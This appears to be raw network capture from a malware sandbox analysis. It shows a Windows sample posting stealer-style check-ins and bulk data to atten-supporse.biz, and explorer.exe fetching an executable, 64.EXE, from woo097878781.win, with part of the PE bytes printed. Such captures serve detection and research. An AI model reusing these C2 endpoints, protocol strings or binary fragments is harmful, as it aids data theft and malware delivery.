2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 68 78 00 71 84 fe c8 68 c0 82 33 f8 d5 d9 eb 2e 92 f0 ad 5f 7a 61 01 e1 2e 9f a6 1b 52 50 0c 2c 3f e6 da f4 d5 ce 19 8d 8c 4e f5 4f bd ff e6 fc be 5e 55 cb 0d 05 eb 44 32 89 41 82 c9 12 b3 5d 52 db b5 e8 fb bb ea a2 8e 39 46 f4 3d 89 25 da 1b ce a5 9d e5 2f 00 be fe 2c 5c 64 07 06 07 ff 85 bd 87 00 e3 24 91 42 e2 3b bc 53 1f 31 7c dd aa 6a 98 29 8f 08 aa 11 80 a7 9f dc f6 e3 07 ea 78 b5 9b fc 23 d5 a4 8a 01 75 30 b5 03 3f 85 03 4b 5f 21 b8 2f 82 f1 60 ef bd 0e 75 a0 76 13 ea b4 59 7d 8a 83 1c 44 dc 78 45 51 e7 8e 1d 38 05 a5 63 c3 14 5b fe fb 5c 65 fd 47 47 58 be 98 0f 7d 6f a8 ea 7d b6 fb 8a cb 9b c3 75 b9 12 10 d9 4b a4 73 37 3d 0e 67 36 31 b2 37 12 5e 66 dc af da 0f 92 9e 49 dd ba 82 66 1f e4 33 4d 5d f8 51 49 50 4e bf 01 49 ba a5 f9 af 8a 80 9e b1 fc Data Ascii: hxqh3._za.RP,?NO^UD2A]R9F=%/,\d$B;S1\|j)x#u0?K_!/`uvY}DxEQ8c[\eGGX}o}uKs7=g617^fIf3M]QIPNI
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: c2 92 eb 57 23 e9 f5 91 83 7c ed 1b c5 ff 74 57 d7 34 b3 b7 a1 f9 3f 28 d1 85 d3 05 b1 72 c9 f3 0d 49 9a 99 e5 fa 2c a4 f6 4c 8e b4 49 52 2a 2d be 84 95 08 df 92 2e 53 52 85 5a f7 8b b0 38 cd a4 7f a1 70 a1 f5 d7 71 0c 27 03 00 71 57 ea a9 41 5e 67 a9 8b 5d 54 23 57 40 59 6e b8 71 09 50 58 ff c3 05 8d 9b 81 0e b2 50 a5 41 cf 52 dd 78 ab c1 b7 a6 dd 18 58 e9 c6 e7 03 3c b0 cb 1e 1c bc cf 32 47 ad 7f 1f 06 c6 01 f0 79 d1 e2 87 75 8e d1 f4 fd 00 7c ee b5 b3 b0 7d d7 f1 fd 60 2b ed 3c 06 ac c9 e9 5d ec 55 6a a4 e4 54 c0 3b f5 c3 f7 b4 7a a2 58 41 84 ec 56 57 6c c4 8c 51 81 cd d6 86 8f b9 e3 8c f2 81 40 84 e9 5f c0 ff df 4d 5b 33 26 83 ff 53 52 a5 62 f4 2e 11 64 74 c9 93 b6 16 3a 0d c1 4e 10 1b 71 42 85 72 50 e7 32 71 3b 52 96 e0 e0 58 68 ef d6 6d c6 e6 91 cb Data Ascii: W#\|tW4?(rI,LIR*-.SRZ8pq'qWA^g]T#W@YnqPXPARxX<2Gyu\|}`+<]UjT;zXAVWlQ@_M[3&SRb.dt:NqBrP2q;RXhm
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: ac 84 e7 c7 42 9c f2 57 57 6b 45 5b 7c 8c 64 3a e1 fa bd 12 a3 aa 6f 2f 2a d7 bd 76 8e ee 96 4a 47 dc 54 65 62 54 f4 f7 a4 f0 ee ac da ed bf 49 d7 57 d0 0a d9 78 f7 22 f6 6d 75 80 38 b9 26 8d 4b c4 30 20 94 15 fb ee 70 dc 77 a6 e6 48 3e 48 f5 48 d0 b2 1b 88 ce b7 26 e2 e9 d9 56 d1 e7 ff c2 b6 12 59 f2 68 f8 fa d5 9c 18 63 9a 29 a2 f6 fd 3a 59 66 cf d5 3d 55 77 96 6c 07 62 d6 ce 42 4f db a5 77 a3 ba fa a8 ba 7c ae de b8 9b 16 9a 18 58 d4 cc e3 a7 85 01 c9 d4 9c 36 b5 b9 8b d0 9b ed 43 8b 6d ac 7b de 6d 29 3c 61 86 a2 56 ed 65 3d 77 49 05 c5 e5 b5 10 67 8a cd bf 8a 0e 04 4e 06 f4 85 ef 58 0a 05 9a 68 af c5 cf 9a fc 89 7e 95 a7 f9 39 58 b6 a2 28 c6 e6 e2 82 bc 7a 20 be bf c5 1f be 1e 85 33 f3 a0 2c 6f 30 0e 9e 2a b8 47 1e de a7 bf 1b 74 e9 68 40 27 69 b9 27 Data Ascii: BWWkE[\|d:o/vJGTebTIWx"mu8&K0 pwH>HH&VYhc):Yf=UwlbBOw\|X6Cm{m)<aVe=wIgNXh~9X(z 3,o0Gth@'i'
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 29 1c ea 7c a4 de bb df 45 c1 07 f4 0a 61 af 57 ea 3e 82 c8 97 f7 6b 81 1e 6c 74 9d a7 8f 28 44 d6 a3 17 d9 df 8d bc 50 2e 4b 10 7a 79 ac f1 cd e9 63 e5 62 20 a9 04 75 f4 b0 2c be f7 1d e0 60 11 12 9d 82 e5 26 bb f8 2c e9 eb ad a7 5d 3e fc b0 30 03 75 1f 4d 76 10 ba f3 c3 0a 04 a6 30 d2 08 1b e0 29 7a fb 8f e6 f0 93 af 42 17 ee b5 a8 e3 66 2e d5 dc fb 2a 74 4c 05 bd 81 e5 5c 29 d1 d5 7d db ec b5 dc be df 43 41 17 c8 72 7d 5a 41 fb 79 40 56 d5 9f 73 70 43 d4 5f 1d af 5f bb 23 33 83 62 4e 47 99 fe 7b 93 5a c4 23 28 c1 fa 09 fe 58 61 37 4b bb e2 87 cc 69 69 ff ce 88 82 6e 4d 15 b5 98 5a 56 e5 22 2b 8d 0f a4 92 8a 21 1e 8f 29 9b c8 3d ef 41 f1 ae bb 87 b9 22 04 4b 99 39 6e 54 73 46 08 6a 10 20 d1 3e 1d e8 a2 76 97 08 cf 08 f3 bc a1 28 a8 21 e3 b9 0a e0 50 22 Data Ascii: )\|EaW>klt(DP.Kzycb u,`&,]>0uMv0)zBf.*tL\)}CAr}ZAy@VspC__#3bNG{Z#(Xa7KiinMZV"+!)=A"K9nTsFj >v(!P"
2024-12-09 07:08:37 UTC	15331	OUT	Data Raw: 1d ee 2e 2a e9 37 9a ea 89 6f 86 4f c8 b3 cc e0 68 3b ce b4 ad d8 b9 ba 3a 0d 15 9f 9d c5 42 c4 59 a1 b6 76 6d 2f 82 a7 3c 41 21 2b 72 34 5d 22 fc cf a4 60 ad d3 8f 16 cd ec 6f 2d 5a 74 8f df 81 f2 5d 8a a6 5b 1b cd b1 00 91 4f 59 e6 3a e1 cd d2 83 e1 da f2 b6 57 6e 27 6a 51 e8 ab b6 71 ca 24 42 37 4f ed d2 27 82 eb b8 7c 32 4c d5 47 80 9b 6b 1d 26 f2 74 79 58 de 93 00 11 72 08 64 85 f8 60 d9 77 c9 db 75 62 92 ae 61 f9 e7 de 61 20 05 19 ea f4 fa b8 61 fb bb 26 2f 2c f0 49 64 4e 7c 96 37 9c e4 4a e4 4f 99 0d 16 46 24 52 62 a1 e9 5d 76 bf 4d b1 38 b5 f7 1a de 10 4c 2f fd 58 c1 cd 62 77 cb fe 32 35 af db f4 a4 f0 98 e2 09 f4 fb ca 3d 28 b2 23 0a ce 7f 0e a0 dc 50 92 ee da 52 42 2c 0f 2e 5c 05 36 41 c3 f0 8d 88 27 d6 05 c2 ec 00 b9 1e bc a7 3b 55 08 a9 58 cd Data Ascii: .*7oOh;:BYvm/<A!+r4]"`o-Zt][OY:Wn'jQq$B7O'\|2LGk&tyXrd`wubaa a&/,IdN\|7JOF$Rb]vM8L/Xbw25=(#PRB,.\6A';UX
2024-12-09 07:08:45 UTC	1025	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j07tqil6urpnqhsgdcsr8jlufv; expires=Fri, 04-Apr-2025 00:55:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykeHjnBQ34E%2BpfBUy63kb20JAa1Ibv7bHBvCjoJGWK9%2ByCOU%2FRsIS0p2FI1k78pMYMYxouKKuoUxykIROQNBJEph4z8aAgB3xhFY5ZxkLyjkz2qfe%2BncTjTmqTL7OZHWukmLNFo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef32a3e4ec0efa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1793&rtt_var=681&sent=359&recv=601&lost=0&retrans=0&sent_bytes=2846&recv_bytes=582941&delivery_rate=1598248&cwnd=194&unsent_bytes=0&cid=905a62465ae8b647&ts=6238&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49875	104.21.16.9	443	7172	C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:48 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: atten-supporse.biz
2024-12-09 07:08:48 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 42 38 32 33 41 45 38 36 45 46 43 45 46 34 34 38 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=B823AE86EFCEF44823D904AF30EFEBBC
2024-12-09 07:08:49 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2abnckb7mo7aphotmj9f03i5tg; expires=Fri, 04-Apr-2025 00:55:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g3iMI%2F1PHVJGLCv6yO9jmTKqp6HqGqQHgDm07RKRlWSakbLtSPMuXPxALS15gqyCNOy3w5%2F2lw4sb7baqsUI%2BTnPwbDvhQiD2Q4P5KKtGbNaFNbE5DX%2FDCc0XpAWF4Z%2FDuE%2F0w4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef32a83ade05e7a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1580&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=990&delivery_rate=1790312&cwnd=214&unsent_bytes=0&cid=cf5704d0f414ffb1&ts=947&x=0"
2024-12-09 07:08:49 UTC	214	IN	Data Raw: 64 30 0d 0a 55 75 65 34 33 46 30 58 35 68 70 65 4b 30 48 54 4e 64 6c 68 62 6a 37 6d 2f 59 57 4a 54 6a 73 70 77 70 67 78 79 43 57 57 6c 6c 41 4a 6e 4a 71 70 66 79 33 45 63 69 70 66 4d 65 6c 70 39 6a 31 42 44 39 37 49 71 37 74 2f 44 67 66 7a 71 51 4c 6d 46 4b 44 4b 66 7a 32 42 33 6f 42 79 63 34 4e 38 63 45 34 35 74 68 66 31 51 77 68 4b 78 4d 65 31 70 57 78 65 43 2f 69 70 54 4f 52 65 74 4f 4e 79 61 4d 58 51 71 43 6c 6e 33 45 5a 78 64 32 37 69 44 65 78 50 58 41 2f 54 30 37 53 34 66 52 55 59 39 4d 51 65 75 31 48 7a 39 7a 30 4f 79 4d 71 39 4d 33 4f 4a 64 33 42 4f 4f 62 59 58 39 55 4d 49 53 73 54 48 74 61 56 73 58 67 76 34 71 45 79 56 0d 0a Data Ascii: d0Uue43F0X5hpeK0HTNdlhbj7m/YWJTjspwpgxyCWWllAJnJqpfy3EcipfMelp9j1BD97Iq7t/DgfzqQLmFKDKfz2B3oByc4N8cE45thf1QwhKxMe1pWxeC/ipTORetONyaMXQqCln3EZxd27iDexPXA/T07S4fRUY9MQeu1Hz9z0OyMq9M3OJd3BOObYX9UMISsTHtaVsXgv4qEyV
2024-12-09 07:08:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49879	154.216.20.243	443	2832	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:08:55 UTC	171	OUT	GET /64.EXE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: woo097878781.win
2024-12-09 07:08:55 UTC	274	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:08:55 GMT Content-Type: application/x-msdos-program Content-Length: 1021952 Last-Modified: Mon, 18 Nov 2024 12:28:55 GMT Connection: close ETag: "673b3307-f9800" X-Powered-By: PleskLin Accept-Ranges: bytes
2024-12-09 07:08:55 UTC	16110	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 48 87 75 ed 29 e9 26 ed 29 e9 26 ed 29 e9 26 f6 b4 77 26 e7 29 e9 26 e4 51 6e 26 ec 29 e9 26 e4 51 7a 26 fc 29 e9 26 ed 29 e8 26 4f 29 e9 26 f6 b4 42 26 d9 29 e9 26 f6 b4 43 26 90 29 e9 26 f6 b4 74 26 ec 29 e9 26 52 69 63 68 ed 29 e9 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 ea e3 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 46 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Hu)&)&)&w&)&Qn&)&Qz&)&)&O)&B&)&C&)&t&)&Rich)&PEd6g"F
2024-12-09 07:08:55 UTC	16384	IN	Data Raw: 24 60 ff 15 ba 16 0d 00 8b 44 24 68 39 44 24 48 0f 85 8d 01 00 00 48 c7 44 24 78 00 00 00 00 48 8d 15 8c 26 0d 00 48 8b 4c 24 70 e8 92 6b 00 00 48 89 44 24 78 48 83 7c 24 78 00 0f 84 62 01 00 00 48 8d 15 7a 26 0d 00 48 8b 4c 24 78 e8 70 6b 00 00 48 89 84 24 80 00 00 00 48 83 bc 24 80 00 00 00 00 0f 84 3a 01 00 00 48 8b 84 24 80 00 00 00 48 83 c0 11 48 89 84 24 80 00 00 00 c7 84 24 88 00 00 00 00 00 00 00 48 63 84 24 88 00 00 00 48 8b 8c 24 80 00 00 00 0f be 04 01 83 f8 22 74 12 8b 84 24 88 00 00 00 ff c0 89 84 24 88 00 00 00 eb d5 4c 8d 84 24 98 00 00 00 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 c3 ab 0b 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 0f 84 bd 00 00 00 48 8b 84 24 90 00 00 00 48 83 c0 05 48 89 84 24 b0 00 00 00 8b 84 24 98 00 Data Ascii: $`D$h9D$HHD$xH&HL$pkHD$xH\|$xbHz&HL$xpkH$H$:H$HH$$Hc$H$"t$$L$$H$H$H$H$HH$$
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: 00 00 00 48 8d 8c 24 b8 00 00 00 e8 92 2d 00 00 8b 8c 24 38 01 00 00 48 63 94 24 f4 00 00 00 4c 8b 84 24 30 01 00 00 49 8d 14 50 48 89 94 24 10 01 00 00 4c 8b c8 4c 8d 05 45 f6 0c 00 8b d1 48 8b 84 24 10 01 00 00 48 8b c8 e8 43 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 8b 84 24 38 01 00 00 48 63 8c 24 f4 00 00 00 48 8b 94 24 30 01 00 00 48 8d 0c 4a 4c 8d 05 1b f6 0c 00 8b d0 e8 08 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 48 8d 8c 24 b8 00 00 00 e8 e9 2b 00 00 90 48 8d 8c 24 90 00 00 00 e8 db 2b 00 00 90 48 8d 4c 24 30 e8 d0 2b 00 00 90 48 8d 4c 24 60 e8 c5 2b 00 00 48 8b 8c 24 18 01 00 00 48 33 cc e8 b5 9e 0b 00 48 81 c4 28 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 48 89 54 24 10 48 89 4c Data Ascii: H$-$8Hc$L$0IPH$LLEH$HC$$$8Hc$H$0HJL$$H$+H$+HL$0+HL$`+H$H3H(LD$HT$HL
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: 84 24 30 01 00 00 ff c0 89 84 24 30 01 00 00 48 63 84 24 30 01 00 00 48 83 f8 6a 0f 83 e6 00 00 00 83 bc 24 f0 0a 00 00 00 74 7a 48 63 84 24 30 01 00 00 48 8d 0d a8 b5 0d 00 4c 8d 8c 24 40 01 00 00 41 b8 08 00 00 00 8b 94 24 f0 0a 00 00 48 8b 0c c1 e8 da fc ff ff 48 8d 94 24 40 01 00 00 48 8b 4c 24 30 ff 15 f7 94 0c 00 48 89 84 24 c0 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 90 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c0 09 00 00 48 89 08 48 83 bc 24 c0 09 00 00 00 75 07 33 c0 e9 ff 13 00 00 eb 5d 48 63 84 24 30 01 00 00 48 8d 0d 2e b5 0d 00 48 8b 04 c1 48 83 c0 08 48 8b d0 48 8b 4c 24 30 ff 15 98 94 0c 00 48 89 84 24 c8 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 31 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c8 09 00 00 48 89 08 48 83 bc 24 c8 09 00 00 00 75 07 33 c0 e9 a0 Data Ascii: $0$0Hc$0Hj$tzHc$0HL$@A$HH$@HL$0H$Hc$0HHH$HH$u3]Hc$0H.HHHHL$0H$Hc$0H1HH$HH$u3
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: 1c 8b 44 24 14 99 83 e2 03 03 c2 c1 f8 02 8b 4c 24 1c 2b c8 8b c1 89 44 24 14 8b 44 24 14 05 f4 05 00 00 89 44 24 08 66 0f 6e 44 24 08 f3 0f e6 c0 f2 0f 5c 05 a1 eb 0c 00 f2 0f 5e 05 91 eb 0c 00 f2 0f 2c c0 89 44 24 0c 8b 44 24 0c 25 ff 7f 00 00 69 c0 ad 8e 00 00 99 b9 64 00 00 00 f7 f9 89 44 24 18 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 66 0f 6e c0 f3 0f e6 c0 f2 0f 5e 05 4a eb 0c 00 f2 0f 2c c0 89 04 24 66 0f 6e 04 24 f3 0f e6 c0 f2 0f 10 0d 32 eb 0c 00 f2 0f 59 c8 66 0f 28 c1 f2 0f 2c c0 89 44 24 10 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 2b 44 24 10 48 8b 4c 24 40 89 41 10 83 3c 24 0e 7d 0b 8b 04 24 ff c8 89 44 24 20 eb 0a 8b 04 24 83 e8 0d 89 44 24 20 48 8b 44 24 40 8b 4c 24 20 89 48 0c 48 8b 44 24 40 83 78 0c 02 7e 0f 8b 44 24 0c 2d 6c 12 00 00 89 44 24 24 Data Ascii: D$L$+D$D$D$fnD$\^,D$D$%idD$D$L$+fn^J,$fn$2Yf(,D$D$L$++D$HL$@A<$}$D$ $D$ HD$@L$ HHD$@x~D$-lD$$
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: 75 0a 48 8b 44 24 38 48 89 44 24 20 83 bc 24 0c 01 00 00 00 7c 37 c7 44 24 34 00 00 00 00 eb 0a 8b 44 24 34 ff c0 89 44 24 34 8b 84 24 0c 01 00 00 39 44 24 34 7d 14 48 63 44 24 34 48 8b 4c 24 38 0f be 04 01 85 c0 74 02 eb d5 eb 0e 48 8b 4c 24 38 e8 0b 15 00 00 89 44 24 34 e9 fb 04 00 00 0f b6 84 24 08 01 00 00 83 f8 0e 75 0d c7 84 24 f4 01 00 00 22 00 00 00 eb 0b c7 84 24 f4 01 00 00 27 00 00 00 0f b6 84 24 f4 01 00 00 88 84 24 70 01 00 00 0f b6 84 24 e0 00 00 00 85 c0 74 17 48 8b 8c 24 f0 00 00 00 e8 85 07 00 00 48 89 84 24 68 01 00 00 eb 28 48 8b 84 24 40 02 00 00 48 83 c0 08 48 89 84 24 40 02 00 00 48 8b 84 24 40 02 00 00 48 8b 40 f8 48 89 84 24 68 01 00 00 48 83 bc 24 68 01 00 00 00 75 0d c7 84 24 f8 01 00 00 01 00 00 00 eb 0b c7 84 24 f8 01 00 00 00 Data Ascii: uHD$8HD$ $\|7D$4D$4D$4$9D$4}HcD$4HL$8tHL$8D$4$u$"$'$$p$tH$H$h(H$@HH$@H$@H@H$hH$hu$$
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: 00 00 48 8b 4c 24 38 4c 8b 49 30 4c 8d 05 b8 28 0d 00 8b d0 b9 0a 08 00 00 e8 14 ec ff ff 89 44 24 30 83 7c 24 40 02 7c 29 8b 05 3b 0c 0d 00 ff c0 48 8b 4c 24 38 48 83 c1 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b d0 e8 c0 fb ff ff 83 7c 24 68 00 75 11 83 7c 24 40 01 7c 0a 48 8b 4c 24 38 e8 48 fd ff ff 83 7c 24 40 03 7c 28 48 8b 44 24 38 48 83 c0 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b 15 d9 0b 0d 00 48 8b c8 e8 79 fb ff ff 48 8b 44 24 38 0f b6 4c 24 68 88 48 18 8b 44 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: HL$8LI0L(D$0\|$@\|);HL$8HD$ AE3\|$hu\|$@\|HL$8H\|$@\|(HD$8HD$ AE3HyHD$8L$hHD$0HXT$HL$3HT$HL$3
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: 48 8b 44 24 60 48 63 40 08 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 38 48 8b 44 24 38 48 8b 4c 24 20 48 89 08 48 8b 44 24 38 48 83 c0 38 48 8b 4c 24 38 48 89 41 08 48 8b 44 24 38 c6 40 15 01 48 8b 44 24 38 c6 40 16 00 48 8b 44 24 38 48 8b 4c 24 60 48 8b 49 40 48 89 48 18 48 8b 44 24 60 48 8b 4c 24 38 48 89 48 40 48 8b 44 24 60 48 63 40 10 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 20 e9 60 ff ff ff 48 8b 44 24 60 48 83 78 40 00 74 0a c7 44 24 48 01 00 00 00 eb 08 c7 44 24 48 00 00 00 00 8b 44 24 48 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 48 c7 44 24 20 00 00 00 00 8b 05 25 8d 0d 00 39 44 24 40 0f 8f 92 00 00 00 48 8b 0d 30 8d 0d 00 e8 83 56 ff ff 48 8b 05 2c 8d 0d 00 48 89 44 24 20 48 83 7c 24 Data Ascii: HD$`Hc@HL$ HHHD$8HD$8HL$ HHD$8H8HL$8HAHD$8@HD$8@HD$8HL$`HI@HHHD$`HL$8HH@HD$`Hc@HL$ HHHD$ `HD$`Hx@tD$HD$HD$HHXL$H8HD$ %9D$@H0VH,HD$ H\|$
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: d2 8b 44 24 28 b9 08 00 00 00 f7 f1 8b c0 48 8b 4c 24 20 0f b6 44 01 10 8b 4c 24 28 83 e1 07 ba 01 00 00 00 d3 e2 8b ca 23 c1 85 c0 74 0a c7 44 24 08 01 00 00 00 eb 08 c7 44 24 08 00 00 00 00 8b 44 24 08 eb 68 eb 66 8b 44 24 28 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 8b 44 24 28 ff c0 89 44 24 28 8b 44 24 04 48 8b 4c 24 20 83 7c 81 10 00 74 35 8b 44 24 04 48 8b 4c 24 20 8b 54 24 28 39 54 81 10 75 07 b8 01 00 00 00 eb 1d 8b 44 24 04 ff c0 8b c0 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 eb bb 33 c0 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 58 c7 44 24 20 00 00 00 00 48 8b 44 24 60 48 8b 40 20 48 89 44 24 28 48 8b 44 24 28 0f b6 40 09 83 f8 02 0f 84 a9 00 00 00 48 8b 4c 24 28 e8 75 01 00 00 89 44 Data Ascii: D$(HL$ DL$(#tD$D$D$hfD$(3\|HHD$D$(D$(D$HL$ \|t5D$HL$ T$(9TuD$3\|HHD$3HHL$HXD$ HD$`H@ HD$(HD$(@HL$(uD
2024-12-09 07:08:56 UTC	16384	IN	Data Raw: 10 48 8b 4c 24 28 48 8b 44 24 30 ff 90 00 01 00 00 48 8b 4c 24 28 e8 37 bc ff ff 48 8b 44 24 30 48 8b 48 70 e8 f9 a2 00 00 8b 44 24 20 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f bf 40 2e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f b6 40 09 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 7d 06 00 00 48 8b 44 24 30 0f bf 40 3c 85 c0 7c 26 48 8b 44 24 30 0f bf 40 3c 83 c0 03 8b d0 48 8b 4c 24 30 e8 28 00 00 00 b8 ff ff ff ff Data Ascii: HL$(HD$0HL$(7HD$0HHpD$ HHHL$HD$@.HL$HD$H@HHL$HD$H@HL$HD$@HL$H(HL$0}HD$0@<\|&HD$0@<HL$0(

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49933	104.21.16.9	443

Timestamp	Bytes transferred	Direction	Data
2024-12-09 07:09:01 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 07:09:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 07:09:02 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=296qtice59ode1dp2pj4jrb8bl; expires=Fri, 04-Apr-2025 00:55:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CVapvT4w82bZEWViiVWgNXkvouz7ZgcNZpj6blg4YBXEEIqBi%2Fr17ba5dx41CSm5RC8tM3C7iBLqvru4J717FOzkg980ef1gbFmpvEPaO%2FVmDYb1XZrLr%2F2yPLD4rc6Dnh%2FZZ%2FU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef32ad80b7f41f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1548&rtt_var=774&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4230&recv_bytes=909&delivery_rate=148125&cwnd=223&unsent_bytes=0&cid=adead4bf447c23ca&ts=744&x=0"
2024-12-09 07:09:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
